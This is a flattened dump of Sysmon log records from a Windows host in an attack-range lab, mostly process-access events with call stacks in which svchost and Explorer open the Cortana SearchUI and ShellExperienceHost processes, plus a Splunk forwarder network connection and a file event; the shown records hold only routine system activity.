07:51:25.580{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+74d7|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a384|C:\Windows\SYSTEM32\psmserviceexthost.dll+11055|C:\Windows\SYSTEM32\psmserviceexthost.dll+108cf|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048213Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:51:25.580{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+489d|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a2ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+11055|C:\Windows\SYSTEM32\psmserviceexthost.dll+108cf|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048212Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:25.580{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+489d|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a2ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+11055|C:\Windows\SYSTEM32\psmserviceexthost.dll+108cf|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048211Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:51:25.580{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+489d|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a2ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+11055|C:\Windows\SYSTEM32\psmserviceexthost.dll+108cf|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048210Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:25.580{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+489d|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a2ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+11055|C:\Windows\SYSTEM32\psmserviceexthost.dll+108cf|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048209Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:51:25.580{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+74d7|C:\Windows\SYSTEM32\psmserviceexthost.dll+12fce|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001048208Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:51:25.580{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001048207Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:51:25.580{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001048206Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:51:25.580{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001048205Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:51:25.580{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001048204Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:51:25.580{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+739b|C:\Windows\SYSTEM32\psmserviceexthost.dll+ae34|C:\Windows\SYSTEM32\psmserviceexthost.dll+7bae|C:\Windows\SYSTEM32\psmserviceexthost.dll+12141|C:\Windows\SYSTEM32\psmserviceexthost.dll+170e8|C:\Windows\SYSTEM32\resourcepolicyserver.dll+12326|C:\Windows\SYSTEM32\resourcepolicyserver.dll+bac5|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048203Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:51:25.580{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001048202Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:51:25.580{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001048201Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:25.580{466BC892-32D3-60E8-770B-00000000CF01}63567280C:\Windows\Explorer.EXE{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d2c9|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048200Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:51:25.580{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001048199Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:51:25.580{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001048198Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:51:25.580{466BC892-32D3-60E8-770B-00000000CF01}63567856C:\Windows\Explorer.EXE{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+109146|C:\Windows\System32\TwinUI.dll+82a97|C:\Windows\System32\TwinUI.dll+beade|C:\Windows\System32\TwinUI.dll+beaa9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048197Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:25.580{466BC892-32D3-60E8-770B-00000000CF01}63567856C:\Windows\Explorer.EXE{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+109146|C:\Windows\System32\TwinUI.dll+82a97|C:\Windows\System32\TwinUI.dll+beade|C:\Windows\System32\TwinUI.dll+beaa9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x80000000000000001048196Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:17.725{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local51012-false10.0.1.12-8000- 23542300x80000000000000001048195Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:51:25.096{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0D8C71D55304FAA4EE9C633A61748205,SHA256=485D6CE2FCAAF382184566F15AD1EC45D71B62127366B6158D4202FDD13B6576,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001048243Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:26.397{466BC892-32D3-60E8-770B-00000000CF01}63567232C:\Windows\Explorer.EXE{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+ba2b0|C:\Windows\System32\TwinUI.dll+ba627|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+61c3f|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+5e336|C:\Windows\System32\combase.dll+5daea|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e 10341000x80000000000000001048242Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:51:26.397{466BC892-32D3-60E8-770B-00000000CF01}63567232C:\Windows\Explorer.EXE{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+ba2b0|C:\Windows\System32\TwinUI.dll+ba627|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+61c3f|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+5e336|C:\Windows\System32\combase.dll+5daea|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e 10341000x80000000000000001048241Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
